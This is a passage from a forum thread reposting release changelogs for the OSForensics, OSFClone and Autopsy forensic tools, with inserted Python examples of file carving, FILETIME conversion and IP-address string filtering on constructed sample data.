Added checkbox option to include 'Case Activity Log' into the main report
When generating a Case Log report, the exported log entries are exactly as displayed in the Case Log Viewer (ie. Verbosity, filters, sorting, etc applied)
Added a HTML Editor to allow user to modify case summary narrative. Can be located under "Edit Case Details".
Added progress bar when saving the case files to a folder before the case is deleted.
Added new report type 'Log Report' for Case Log reports

Shadow copies:

Fixed an issue when adding shadow copies to a case, if selecting an individual shadow copy it would store an incorrect Device path (eg Drive-C instead of Drive-C:) which would lead to it not being displayed on the analyze shadow copy dialog.
Added a Shadow Copy Analyze icon to start page
Stopped a shadow copy entity being compared against itself, as it only makes sense to compare different shadows.
Added a warning message when opening the analyze dialog if no shadow copies were added to the case.

System information:

BitLocker Detection preset added to System Information
Updates to System information to detect new CPU types
Added Printer Info from registry for live/scan drive and Printer Info from (WinSpool) for Live Systems in the System Information module.

Registry Hive viewer:

Fixed a bug when opening a backup hive that was locked and a shadow copy was required to provide access.
Dialog to select from a list of known files now shows the file size

Hashing:

Button to add Hash results to case

Thumbnail database viewer:

Fixed large memory usage when reading Win10 thumbcache files.
Added support for Win10 thumbcache files. The Win10 thumbcache header uses a different format than previous versions
Added to list of known thumbnail cache files
Replaced thumbnail size radio buttons with combo box
Dialog to select from a list of known files now shows the file size

Internal file viewer:

Updated video previewer to support more video formats, including: 3GP, ASF, ADTS, MPEG-4, SAMI, AAC, WMA, DV Video, H.264/H.263, WMV
Can do screen capture from the File Viewer.

Email searching:

Added BCC searching for Emails.
Additional details are indexed when indexing Emails (for some formats).
Support for MIME UTF8 encoded FROM, TO, CC, BCC, SUBJECT fields in MBOX files

Deleted files:

Added a new checkbox for full disk / unallocated space carving. Previously only unallocated space was used for carving, as it is usually much faster. But in rare situations the full disk option can be useful (e.g. file slack space examination).
Added a new window showing the list of File Types that are carved (opened from within the config window). This list can be modified to add custom signatures by the user by editing the osf_filecarve.conf file.
Ability to group the search results by file type in 'File Details' view
When grouping the results by file type, the groups are collapsed by default

Other changes:

Added better time resolution, now fractions of seconds, in File Name Search/Mismatch Search/Deleted Search
Added support for Win10 prefetch files, which are compressed using lzxpress huffman stream encoding
Compare signatures can now display identical files. This is useful for duplicate file detection. There is a configuration dialog for specifying folders to exclude and file extensions to include.
Dozens of other bug fixes and minor usability improvements, including fixing a couple of crash bugs
Fixed up broken XP compatibility. This is very likely the last release we do that has any support for running on Windows XP.
Populating the drive list (for drive preparation) is no longer performed on program startup to speed up load time
Loading of Magic config file (for mismatch search) is now performed on demand to speed up program load time
Populating the device list (for raw disk viewer) is no longer performed on program startup to speed up load time
When loading the log file (secure log), a buffer is now used to speed up load time

http://www.osforensics.com/
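Two of the carving points in the notes above, the 3.3.1001 naming scheme "Carved (type) file (Sector Location in HEX).extension" and the 4.0 choice between full-disk and unallocated-only carving with a user-editable signature list, are illustrated by this added example. It is not OSForensics' code and does not use its osf_filecarve.conf format; the signature table and the 16-sector sample image are constructed.

```python
"""Minimal signature carver over a raw image (added example; not OSForensics'
code and not its osf_filecarve.conf format). The signature table stands in
for a user-editable signature list, and the image below is constructed.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

SECTOR = 512


@dataclass(frozen=True)
class Signature:
    ext: str
    header: bytes
    footer: Optional[bytes]   # None: no trailer, carve up to max_len
    max_len: int


# Real magic bytes for two common types; extend as a custom signature list.
SIGNATURES = [
    Signature("jpg", b"\xff\xd8\xff", b"\xff\xd9", 8 * 1024 * 1024),
    Signature("png", b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82", 8 * 1024 * 1024),
]


def carved_name(offset: int, ext: str) -> str:
    """Name the output after its start sector in hex, e.g.
    Carved 'jpg' file 0x00001F2B.jpg, so the location stays traceable."""
    return f"Carved '{ext}' file 0x{offset // SECTOR:08X}.{ext}"


def extract(image: bytes, offset: int, sig: Signature) -> bytes:
    """Cut from the header to the footer (if one is found within max_len),
    otherwise take max_len bytes; never read past the end of the image."""
    limit = min(offset + sig.max_len, len(image))
    if sig.footer is not None:
        end = image.find(sig.footer, offset + len(sig.header), limit)
        if end != -1:
            return image[offset:end + len(sig.footer)]
    return image[offset:limit]


def carve(image: bytes,
          ranges: Optional[List[Tuple[int, int]]] = None) -> List[Tuple[str, bytes]]:
    """Scan sector-aligned offsets for known headers.

    ranges=None scans the full disk (slower, but also finds remnants in
    file slack); a list of (start, end) byte ranges restricts the scan to
    unallocated space, the usual faster default.
    """
    if ranges is None:
        ranges = [(0, len(image))]
    found = []
    for start, end in ranges:
        off = -(-start // SECTOR) * SECTOR          # round up to a sector boundary
        end = min(end, len(image))
        while off < end:
            for sig in SIGNATURES:
                if image.startswith(sig.header, off):
                    data = extract(image, off, sig)
                    found.append((carved_name(off, sig.ext), data))
                    # resume at the first sector after the carved object
                    off += -(-len(data) // SECTOR) * SECTOR
                    break
            else:
                off += SECTOR
    return found


def build_sample_image() -> bytes:
    """Constructed 16-sector image: a JPEG at sector 3 and a PNG at sector 9."""
    img = bytearray(16 * SECTOR)
    jpg = b"\xff\xd8\xff\xe0" + b"J" * 700 + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"P" * 300 + b"IEND\xae\x42\x60\x82"
    img[3 * SECTOR:3 * SECTOR + len(jpg)] = jpg
    img[9 * SECTOR:9 * SECTOR + len(png)] = png
    return bytes(img)


if __name__ == "__main__":
    image = build_sample_image()
    print("full disk:", [name for name, _ in carve(image)])
    # pretend sectors 0-7 are allocated, so only sectors 8-15 are unallocated
    print("unallocated only:", [name for name, _ in carve(image, [(8 * SECTOR, 16 * SECTOR)])])
```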
Title: OSForensics 4.0 Build 1001
Post by: SiLæncer on 17 November, 2016, 06:00
Changelog

Case Manager:

When generating report, fixed incorrect links being generated when 'Copy files' is checked
Improved the performance of adding items to case by performing the hash calculations all at once (rather than separately)
Improved the performance of updating case flags by not re-drawing the lists for File Name Search, Mismatch Search, Deleted File Search, Index Search, File System Browser
Allowed the HTML editor to be left open from the "Edit Case Detail" dialog window. However, as a result, the case narrative is prevented from being edited from the New Case dialog procedure.

Case Log Viewer:

Improved the performance of adding new log entries

Decryption & Password Recovery:

Added Openoffice (LibreOffice) extensions to select file dialog
Removed bell sound from gpu client, cpu client, and server and replaced with a different (chime) sound
Fixed typo in default definition file

Forensic Copy:

Added a clear log button and started displaying the number of files copied
Reduced the amount of memory used substantially during the forensic copy process

Recent Activity:

Added Time Source Column for 'All'

http://www.osforensics.com/
Title: OSForensics 4.0.1002
Post by: SiLæncer on 01 December, 2016, 09:19
Changelog

Activity Monitor

Added separate tasks for adding files to case

Case Manager

Fixed synchronization issues with hash table causing an exception to be thrown
Add file to case dialog has been changed to modeless, allowing the user to switch to another module while files are being added.
Added synchronization to CaseManager class to support concurrent access to case items
Added error message when creating/importing/loading/deleting a case while a task is still running
When closing the program, a warning dialog is displayed when any task is still running (as opposed to a select few tasks)
Fixed scroll bar being reset every time case items are added/removed
Adjusted the maximum text to 245K characters in the rich edit box for case narrative
Changed the case item list view to owner draw to improve performance
Decreased the time required to delete a large number of items from case
Fixed ‘re-use input’ checkbox not working when adding bookmarked files to case
Added error message when attempting to add bookmarked folders to case
Increased the frequency of progress updates when adding multiple files to case
Case items are now sorted by date in ascending order by default
Fixed bug when attempting to overwrite an existing external report in case
Fixed non-existent case default drive appearing in drop down box when editing case
Improved performance of updating list items (eg. in File Search, Mismatch Search, Deleted Search) when case flags are updated
Fixed memory leaks in case log

Decryption & Password Recovery

Added more info to display, client thread status, benchmark, password length and prefix. Adjusted job size for CPU clients.

Deleted Files Search

Fixed junk characters showing up in error message when prompting to overwrite a file
Fixed case flags not being updated in thumbnail view

Email Viewer

Fixed unhandled exception when failing to load e-mail file

File indexing and searching

Fixed bug with Doc/Ppt/Xls indexing “last modified” as “Author”. Will now prioritize “Author” and only index “Last modified” if “Author” is not available.
Added support for Comments property (appended to KEYWORDS meta tag) in DOC files, and support for “Category” property (as “ZOOMCATEGORY” meta tag) in PPT and XLS files

Raw Disk Viewer

Fixed bookmarks showing up twice when reloading a case

ThumbCache Viewer

Fixed ‘use same details for all’ checkbox not working when adding to case
Due to changes in Win10, the ‘name’ column should now show the thumbnail cache ID in hex format (instead of a cryptic string)

Misc

Updated HTML Editor to show character count

http://www.osforensics.com/
Title: Autopsy 4.3.0
Post by: SiLæncer on 19 January, 2017, 20:00
Changelog

Support for slack space on files (as separate virtual files) to enable keyword searching and other analysis
Simple mode for the file extension mismatch module that focuses on only multimedia and executable files to reduce false positives
New view in tree that shows the MIME types
Tagged items are highlighted in table views
Ordering of columns is saved when user changes them
Support for Android devices with preloaders (uses backup GPT)
Support for images with no file systems (all data is added as unallocated space)
User can bulk add list of keywords to a keyword list
New "Experimental" module (activate via Tools, Plugins) with auto ingest feature
Assorted bug fixes and minor enhancements

http://www.sleuthkit.org/autopsy/desc.php
Title: Autopsy 4.4.0
Post by: SiLæncer on 31 May, 2017, 05:30
Changelog

Keyword search regular expressions now work with spaces.
A sparse VHD file can be created when analyzing a local drive (USB) so that you don't need to acquire first.
Ingest filters allow you to run the ingest modules on only a subset of files during triage
Ingest profiles allow you to pick an ingest filter and set of ingest modules to make it easier to preprogram for triage
User can edit keyword lists.
Import/export of interesting files set membership rules.
Fix resolution issue with high DPI systems
Updated Recent Activity ingest module to use RegRipper 2.8 plugins.
Ability to customize HTML report logo.
Assorted small enhancements and bug fixes.

http://www.sleuthkit.org/autopsy/desc.php
Title: OSForensics 5.0.1000
Post by: SiLæncer on 01 June, 2017, 09:14
Changelog

•New PList Viewer
◦Added a new Plist viewer
◦Text forward/reverse search option.
◦For nodes that contain “data”, added quick hex preview popup dialog when field is single-clicked (double clicking will open a new file viewer window).
•NEW $UsnJrnl Viewer
◦Added support for loading $UsnJrnl files saved as a regular file (ie. not as $J alternate data stream)
◦Added support for $MFT file lookup to determine full path
◦Added support for searching for subtext
◦Added right-click menu options for viewing file, exporting records and adding records to case
◦Added progress bar when parsing USN records, loading $MFT file and searching for subtext
◦Improved loading speed by searching for records from the end of the file
◦Path is now determined using the Parent MFT# stored in the USN record, followed by the filename stored in the USN record.
◦ Paths that may not be correct are coloured in red. This occurs when the filename or the parent MFT# in the USN record does not match what is stored in the $MFT
•Analyze Shadow Volume
◦Results can now be exported in HTML and CSV format
◦Added button to export results to case
◦Added right-click menu for exporting results
•Case Manager
◦Added support for mounting file paths as a device in the case
◦Adding devices to case now supports adding local folders in addition to network paths. Renamed ‘Network Path (UNC)’ to ‘Folder / Network Path’
◦When adding an image file to case, the ‘Select partition’ dialog has been updated to reduce confusion.
◦Added option to export $UsnJrnl records to report
◦Fixed index OOB error when exporting deleted files to report
◦Added support for adding BitLocker-encrypted drives to case. The drive must have been previously added to the case.
◦Fixed error message when viewing the properties of a Case Device
◦Recent history items for case name, investigator, contact details etc are now saved to the config and will be reloaded when OSForensics is started.
•Compare Signature
◦Check if signature reports as version 3 but is actually 4 (two extra fields were added but internal version number of signature was not changed).
•Create / Verify Hash
◦Added secondary hash function to allow calculating 2 different hashes simultaneously
•Deleted Files Search
◦Added right-click menu to re-arrange columns in Details View
◦Added ‘Source’ and ‘File number’ columns to details view
◦Directory records found in $I30 slack space are now included in the results
◦Records found in $I30 attribute in deleted MFT directory records are now included in the results
◦Fixed bug with misreported quality when multiple streams exist for the deleted file
◦“Save and Open” right-click options no longer prompt the user for a location to save the file; it shall be saved automatically to the temp folder and immediately opened. The right-click options have also been renamed accordingly
◦When opening deleted files in the internal viewer, the initial tab that is displayed will correspond to the file extension
◦Fixed bug with saving deleted files to disk when the file fragments are greater than 64KB
◦Added *.msg to the search preset for e-mails
•Drive Imaging
◦Fixed error copying single files to logical image due to directories not being created
◦Fixed file size of single file not included when calculating VHD image size
◦When calculating VHD image size, the file size on disk is now used. This is to account for sparse/compressed files that occupy less disk space than its file size.
◦Fixed bug with drive list in ‘Create Image’ tab containing devices from previous case after switching cases
•Email Viewer
◦Fixed buffer overflow of ‘From’ field
◦Fixed heap corruption when opening .eml files with quoted printable encoded text
•File Indexer and searching
◦New Zoom build with fixes for:
◾Fixed bug with indexing zero date as “23/04/2009 6:24:48”
◾Indexing “delivery time” for PST emails. Only index “submit time” if former is not available. Previously was only indexing submit time, which means Drafts/Deleted items would have no time in index but be inconsistent with EmailViewer, which would display a date/time.
◾Now supporting Win10 CompactOS compression (when used with the default XPRESS compression option). Viewing and indexing these files is now possible.
◦Fixed bug with Search Index -> Advanced settings’ Date/Time range not being applied.
◦On History tab, when choosing right-click menu’s “Display Search Results & Add to Case…”, it will now export the list of results to the case along with adding the corresponding files.
•File Name Search
◦Added right-click menu to re-arrange columns in Details View
◦Added *.msg to the search presets for e-mail
◦Fixed performance issue when searching with alternate stream criteria. Basic search criteria (eg. file name, attributes, etc.) should be checked before performing the much slower stream criteria check.
•File System Browser
◦Added checkboxes for performing operations on multiple items without having to continuously hold select/ctrl. Clicking on the ‘n item(s) checked’ link opens a menu with a list of operations to perform.
◦Fixed text not appearing in icon/list view
◦Improved responsiveness when changing directories
◦Fixed bug with calculating folder size on disk for non-NTFS file systems
◦Fixed deadlock when multiple threads are accessing mounted devices simultaneously
◦Added right-click menu to re-arrange columns in Details View
◦When calculating folder sizes, stream sizes are now included
◦Added error messages when performing certain operations on $I30 slack items
◦Deleted artifacts recovered from $I30 slack space can now be displayed.
◦Files that have reparse points are now displayed in green
•Hash Sets
◦Fixed an NSRL hash set import error that could occur when the manufacturer name was greater than 100 characters
•Internal Viewer / File and Hex Viewer
◦File Viewer tab, changed volume controls to trackbar + mute button
◦Added ‘IP address’ filter to Hex Viewer string extraction
◦When viewing buffers (eg. deleted files) in the “file viewer” tab, the buffer shall first be saved to a temporary file and then loaded. Previously, a ‘Unsupported file format’ message is displayed.
◦Removed unnecessary saving of temporary files for file paths containing case devices
◦Extracting strings is now threaded so the window is no longer blocked. String extraction can also be cancelled half way.
◦Removed limit on the number of extracted strings
◦Added encryption, reparse point, sparse file, system compression attribute checkboxes
◦Added right-click menu option to save data to disk. This allows saving file streams and buffers (eg. deleted files) to a file.
◦Added warning text when attempting to view a non-file buffer that exceeds the maximum size (128MB for 64-bit, 16MB for 32-bit)
•Memory Viewer
◦Added right-click menu to re-arrange columns of the process list
◦Changed encoding of memory dump VW cfg file from UTF16-BE to UTF-8
◦Changed the extension for memory dump files from .bin to .mem
◦Added tabs for ‘Live Analysis’ and ‘Static Analysis’. Previous view has been moved to ‘Live Analysis’ tab. ‘Static Analysis’ allows the user to launch ‘Volatility Workbench’ process with the specified memory dump file.
•Passwords
◦New updated password cracking library. Improved GPU acceleration allows for faster cracking. Double the speed in some cases.
◦Find Passwords & Keys: Added right-click menu to re-arrange columns
◦Find Passwords & Keys: Added checkboxes for performing operations on multiple items without having to continuously hold select/ctrl. Clicking on the ‘n item(s) checked’ link opens a menu with a list of operations to perform.
◦Fixed bug where Wifi profiles weren’t searching the correct location in some cases when “Live acquisition” was picked (could search incorrect drive letter)
◦Fixed bug where Wifi profiles might not search correct location in localised (non-english) version of windows
◦Fixed a crash that could occur when searching Wifi profiles
◦Fixed possible crash when getting system passwords
◦Added more info to display, client thread status, benchmark, password length and prefix.
•Prefetch Viewer
◦Fixed possible crash due to buffer overflow
•Raw Disk Viewer
◦Added a list of preset regular expressions combo box that can be used when performing a raw search
◦Improved performance of search window list view
◦Removed max search results limit in search window
◦Fixed synchronization issues potentially resulting in crash
•Recent Activity Viewer
◦Changed how the Windows user directories are searched for, so all operating system dependent locations (XP, Win7 etc) are now searched instead of only the known location of the first one found. For example, if an XP system contained a "Users" folder in the root directory then it was previously only searching the (possibly empty) Users folder and then not searching the "Documents and Settings" location.
◦Fixed a "missing column" error for old versions of Firefox cookies
◦Made some changes when trying to repair a "dirty" Windows search database (eg from a system image of a currently running system) so that if the esentutl tool crashes OSF will attempt to run it again
◦Added P2P artifacts from BitTorrent and UTorrent resume.dat folder, also checks the User’s Download directory for .torrent extensions.
◦Fixed Bug with P2P Items not showing details on the File List Tab
◦Added Search queries artifacts for Ares Galaxy
◦Added Shareaza P2P Search Artifacts.
◦Added Emule P2P Artifacts
◦Added SABnzbd P2P Artifacts
•Report Templates
◦Combined ‘Drive Imaging’ and ‘Forensic Copy’ HTML template into a single ‘Forensic Imaging’ HTML template
•Start Window
◦Renamed “Website Passwords” to “Scan for Passwords/Keys”
◦Renamed “Removable Drive Preparation” to “Drive Preparation”
◦Added icon for launching ‘Volatility Workbench’ under ‘Viewers’ group
•System Information
◦Made some changes to the system information command dialogs, added columns to show "Live acquisition" / "Drive acquisition" / "Image acquisition" differences of commands
•Web Browser
◦Fixed bug where saving the complete webpage was not working correctly
•Misc
◦Changed date/time format to 24-hour clock
◦Fixed crash when Exception filter is executed
◦Moved ‘Forensic Copy’ module to ‘Drive Imaging’ module as a new tab. Renamed ‘Drive Imaging’ to ‘Forensic Imaging’
◦Fixed ‘Forensic Copy’ and ‘Drive Imaging’ logs not appearing in generated report
◦Fixed some flickering issues when resizing
◦Updated File Name Search preset list to include Virtual Machine files
◦Fixed bug with EmailView and EmailViewer displaying 1/01/1601 when a 0 datetime value is given. Now reports "Unknown date".
◦When selecting a directory via a popup dialog, if the entered path in the text box is valid, it will be returned. Otherwise, the directory selected in the tree view is returned.
◦Added template files for exporting $UsnJrnl records to report
◦Fixed bug with the initial directory not being set correctly in the select file dialog
◦When prompted to select a file, the last directory path is now used as the initial directory if not specified
◦Fixed bug in handling alternate data streams with multiple $DATA attributes
◦Added support for accessing bitlocker encrypted drives in raw form
◦Updated HTML Editor to show character count.
◦External Viewers (File, Registry, FS Browser, Email, Thumbcache, ESEDB, $UsnJrnl and Plist) will retain the size of their last viewer window closed for subsequent openings
◦Performance increase when opening registry files
◦Fixed several potential crash points when closing the OSF application while the progress window is still showing
◦Added encryption, reparse point, sparse file, system compression attribute checkboxes
◦Added right-click menu option to save data to disk. This allows saving file streams and buffers (eg. deleted files) to a file.
◦Added warning text when attempting to view a non-file buffer that exceeds the maximum size (128MB for 64-bit, 16MB for 32-bit)
◦Updated help file with $UsnJrnl Viewer section
◦Fixed a bug that may cause Temp Registry Files in the function call CreateTempRegFileIfNeeded() not be created when debugmode is enabled.

http://www.osforensics.com/
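The "1/01/1601" entry in the notes above is the Windows FILETIME epoch showing through: an all-zero 64-bit timestamp means "not set", not a real date, and a viewer that converts it blindly reports 1 January 1601. The following is an added example of mine, not OSForensics code, showing a conversion that treats 0 as unknown and keeps the full 100 ns precision rather than truncating to microseconds. The sample timestamps are constructed; the Unix-epoch constant is the well-known value.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000          # one FILETIME tick is 100 ns
UNIX_EPOCH_FILETIME = 116_444_736_000_000_000   # 1970-01-01 00:00:00 UTC as FILETIME


def filetime_to_datetime(ft: int):
    """Return (datetime, leftover 100 ns ticks) for a raw FILETIME, or None for 0.

    0 is used by NTFS and MAPI for 'not set'; it must not be rendered as 1601-01-01.
    Values outside what datetime can represent raise ValueError instead of
    silently producing a wrong date.
    """
    if ft == 0:
        return None
    if ft < 0:
        raise ValueError("FILETIME is an unsigned 64-bit tick count")
    seconds, ticks = divmod(ft, TICKS_PER_SECOND)
    try:
        dt = FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=ticks // 10)
    except OverflowError as exc:                 # beyond year 9999
        raise ValueError("FILETIME out of datetime range") from exc
    return dt, ticks % 10                        # the 100 ns digit datetime cannot hold


def format_filetime(ft: int) -> str:
    """Report-friendly string: 'Unknown date' for 0, otherwise UTC with 7 decimals
    (6 microsecond digits plus the remaining 100 ns digit) so no precision is lost."""
    converted = filetime_to_datetime(ft)
    if converted is None:
        return "Unknown date"
    dt, tenth = converted
    return f"{dt:%Y-%m-%d %H:%M:%S}.{dt.microsecond:06d}{tenth} UTC"


def filetime_from_bytes(raw: bytes) -> int:
    """Decode the little-endian 8-byte FILETIME as stored in MFT attributes."""
    if len(raw) != 8:
        raise ValueError("FILETIME is exactly 8 bytes")
    return struct.unpack("<Q", raw)[0]


def demo() -> dict:
    """Constructed raw timestamps as they would be read out of an on-disk record."""
    samples = {
        "unset": b"\x00" * 8,
        "unix_epoch": struct.pack("<Q", UNIX_EPOCH_FILETIME),
        "one_second_plus": struct.pack("<Q", UNIX_EPOCH_FILETIME + 12_345_678),
    }
    return {name: format_filetime(filetime_from_bytes(raw)) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, text in demo().items():
        print(f"{name:16s} {text}")
```

The leftover tick is carried separately because Python's datetime stops at microseconds; dropping it is the kind of "decimal precision" loss a later note in this thread mentions fixing, and it matters when correlating NTFS timestamps against $UsnJrnl or registry data.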
Title: OSForensics 5.0 Build 1001
Post by: SiLæncer on 05 June 2017, 12:00
Changelog

File Indexer and searching:

Added a missing DLL (MSVCR100.DLL) to the installer that could prevent ZIP files from being indexed correctly

Internal Viewer - Hex View:

Fixed string extraction function failing to return correct offset due to using 32-bit variables

Memory Viewer:

Fixed an issue where the process refresh timer was running even when the memory viewer window was hidden.

Passwords - Windows Login:

Added right-click menu to tables

http://www.osforensics.com/
Title: OSForensics 5.0.1002
Post by: SiLæncer on 06 June 2017, 12:24
Changelog

•Internal Viewer
◦Fixed a bug where attempting to open an archive (zip etc) file could result in a missing DLL message being displayed on older versions of Windows.
•File Name Search
◦Fixed a buffer overflow that could sometimes cause a crash when displaying file names longer than 512 characters in the "Current folder" field. The crash could appear randomly, as the field was only updated occasionally while a search was in progress.

http://www.osforensics.com/
Title: OSForensics 5.1 Build 1000
Post by: SiLæncer on 06 July 2017, 09:15
Changelog

Case Manager:

Added ".mem" extension when selecting image file to add to case
Chain of Custody Report Template - Rearranged template fields, added signature field.
Generate Report - Allow option to generate Chain of Custody report alongside Case Report.
Overhauled Chain of Custody reporting. Expanded the Edit Case dialog window with tabs to allow additional case data, such as Offense type, Legal Authority & Suspect's Name, to be entered.

Create Index:

Added '.qbb' (Quickbooks) file type to the list of 'Other supported file types' category. Note that only file name will be indexed.

Create Signature:

Deleted files can now be included in the signature from the config window. Hashing is also supported for deleted files (but not for $I30 slack entries)

Compare Signature:

File attribute string now includes custom attributes (eg. 'deleted', '$I30 slack entry')
File icon is now included in the comparison results
Signature info now includes whether deleted files were scanned or not

Deleted Files:

Fixed Bug where saving multiple files would fail to save files to destination.
File Carver - Unallocated Cluster code would not read from the disk when the cluster offsets did not reside on sector boundaries. File Carving initialization will check to see if start cluster offset is a factor of cluster size, if not, file carving will switch to raw carve mode.
File Carver - Addressed bug which might cause carving unallocated clusters not to progress.

DirectAccess – NTFS:

Added buffer overflow check when decompressing CompactOS files
Improved performance of checking for valid $ATTR_FILENAME attribute when looking for $I30 slack entries
Improved performance of FindFirstDel/FirstNextDel functions
Fixed bug with not resetting the file pointer when detecting imageUSB image file. This could result in volume hashes returning the wrong value when verifying the hash of a volume (a few bytes at the start of the file were not included in the hash calculation).

Email Viewer:

Fixed HTML/RTF message body not being searched

File Name Search:

Added config option to 'Search deleted files'. If enabled, deleted and $I30 slack files are included in the search results.
Deleted files are now shown in different text colour and with a deleted icon overlay in 'File List' view. Right click options for viewing files was also added.
Deleted files are now shown as a separate group in 'Timeline' view
Added more file details when exporting the file list to txt/html/csv file
Added support for adding/removing deleted files to/from case
Added support for looking up deleted files in hash set
Added support for saving deleted files to disk from File Name Search module.

File System Browser:

Fixed 'n item(s) checked' still appearing after changing the folder
Added right-click menu option to export list of checked files to Case
File times now include decimal precision
Removed checkboxes in 'File Select' dialog
'File Select' dialog window size is now saved
Fixed auto-scrolling when sorting items

Internal Viewer - Hex View:

Improved performance of string extraction by using parallel processing. Approximately a 60% speed improvement
Improved performance of filtering strings by using Boyer-Moore search & parallel processing. Can be more than twice as fast, depending on hardware
If using a word list, the matched expression is included in the status bar of the selected string
When filtering the string list, the # of strings that have been processed is now displayed
Added option to save to .dic file for use with dictionary based password cracking
Moved filtering operation to thread due to length of operation. User may cancel the filtering operation at any time.
Changed preset filter combo box to a link which brings up a menu when clicked. The menu provides several preset filters, as well as an option to select a word list
Added 'Use RegEx' checkbox to allow user-specified regular expressions

MemViewer - Static Analysis:

'Memory dump file' filter now includes .bin, .img, .dmp extensions
Added 'View & Extract Strings' button to open the dump file in internal viewer in hex view

Thumbnail View:

Fixed text colouring for Deleted/$I30 slack/Reparse point files

Misc:

Updated help file
Improved performance of list classes by using multi reader single writer lock. Fixed some synchronization issues.
When selecting image files, the 'All Images' filter now shows all supported image files rather than all files

http://www.osforensics.com/
Title: OSForensics 5.1.1001
Post by: SiLæncer on 07 July 2017, 12:21
What's new:

Case Manager

Fixed bug when specifying a custom location for a case.

http://www.osforensics.com/
Title: OSFClone 1.2.1000
Post by: SiLæncer on 27 July 2017, 21:00
(http://s26.postimg.org/pq2mi8nix/screenshot_1018.jpg)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

What's new:

Added option to write acquired dd or ewf image back to a drive. Image must reside on root of partition.

http://osforensics.com/tools/create-disk-images.html
Title: OSForensics 5.1.1002
Post by: SiLæncer on 08 August 2017, 11:00
Changelog

Add File To Case function
The copied files in the case folder should now have the same filetimes as the original source file.
Case Manager
Fixed Accessed & Attribute Modified file times not being stored in the OSFMeta file
Case meta item file, added two additional fields (where available): Last Access Date, MFT Modified Date
Deleted Files Search
Fixed changing of ‘Date filter’ combo box in Timeline view not updating the chart
File Indexer and searching
New Zoom build, fixed a crash bug when indexing EML/MBOX files containing attachments of EML/MBOX files
Internal Viewer
Fixed info text for files that belong to the case
When opening a file added to a case, the original folder and file times are now displayed (obtained from the OSFMeta file). These attributes are highlighted in a different colour along with an information text.
For image files, size and file times have been removed
Internal Viewer – Hex View
Split IP address regular expression into IPv4, IPv6 standard notation, IPv6 standard + compressed notation
Recent Activity
Updated installer to include an alternate version of esentutl to use in the case of "Dirty shutdown (-550)" errors for ESEDB databases (eg from Windows search, Edge) that could sometimes cause the locally installed esentutl version to crash, leaving the files in an unreadable state
Misc
Updated help file with internal viewer changes

http://www.osforensics.com/
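The IP address filters for hex-view string extraction, split in this release into IPv4, IPv6 standard and IPv6 standard + compressed notation, are a good illustration of a pattern worth copying: a deliberately loose regular expression to find candidates, followed by a real parser to throw out the false positives (times like 12:30:45, octets above 255). The block below is an added example of mine, not the OSForensics implementation; the regexes are my own, and the byte buffer is constructed to stand in for a memory dump or file slack.

```python
import ipaddress
import re

MIN_STRING_LEN = 4
# Printable-ASCII runs of at least MIN_STRING_LEN bytes: the usual 'strings' definition
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_STRING_LEN)

# Candidate patterns (my own, deliberately loose); ipaddress does the real validation.
# Lookarounds stop matches starting or ending inside a larger token such as 'v1.2.3.4'.
IPV4 = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])")
IPV6_STANDARD = re.compile(r"(?<![\w:])(?:[0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4}(?![\w:])")
# Standard or '::'-compressed form: groups may be empty, 2 to 7 colon-terminated groups
IPV6_ANY = re.compile(r"(?<![\w:])(?:[0-9A-Fa-f]{0,4}:){2,7}[0-9A-Fa-f]{0,4}(?![\w:])")

FILTERS = {
    "ipv4": (IPV4, 4),
    "ipv6": (IPV6_STANDARD, 6),
    "ipv6-compressed": (IPV6_ANY, 6),
}


def extract_strings(buf: bytes):
    """(offset, text) for every printable run, like a hex viewer's string extraction."""
    return [(m.start(), m.group().decode("ascii")) for m in PRINTABLE_RUN.finditer(buf)]


def filter_ips(strings, kind: str):
    """Apply one named filter; each hit is (absolute offset, address text)."""
    pattern, version = FILTERS[kind]
    hits = []
    for offset, text in strings:
        for m in pattern.finditer(text):
            try:
                addr = ipaddress.ip_address(m.group())
            except ValueError:
                continue            # 999.1.1.1, '12:30:45' and similar look-alikes
            if addr.version == version:   # ip_address() also accepts IPv4 text
                hits.append((offset + m.start(), m.group()))
    return hits


# Constructed sample: binary noise around a few request fragments and a timestamp
SAMPLE_BUFFER = (
    b"\x00\x01\x02GET /index.html HTTP/1.1\x00"
    b"Host: 10.0.0.5\x00\x00"
    b"ff02::1\x00"
    b"time 12:30:45\x00"
    b"srv 2001:0db8:0000:0000:0000:ff00:0042:8329 zz\x00"
    b"bad 999.1.1.1\x00\xff\xfe"
)


def scan(buf: bytes = SAMPLE_BUFFER) -> dict:
    """Run every filter over the extracted strings; returns {filter: [addresses]}."""
    strings = extract_strings(buf)
    return {kind: [ip for _, ip in filter_ips(strings, kind)] for kind in FILTERS}


if __name__ == "__main__":
    for kind, addrs in scan().items():
        print(f"{kind:16s} {addrs}")
```

Because `ipaddress.ip_address` accepts both families, the version check is what keeps an IPv4 string out of the IPv6 results; without it the loose compressed-notation regex would happily pass through anything the parser accepts.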
Title: Autopsy 4.4.1
Post by: SiLæncer on 12 August 2017, 10:00
Changelog

Beta version of new central repository feature has been added for correlating artifacts across cases; results are displayed using an Interesting Artifacts branch of the Interesting Items tree and an Other Data Sources content viewer.
Results viewer (top right area of desktop application) sorts are persistent and can be applied to either the table viewer or the thumbnail viewer.
The View Source File in Directory context menu item now works correctly.
Tagged image files in the HTML report are now displayed full-size.
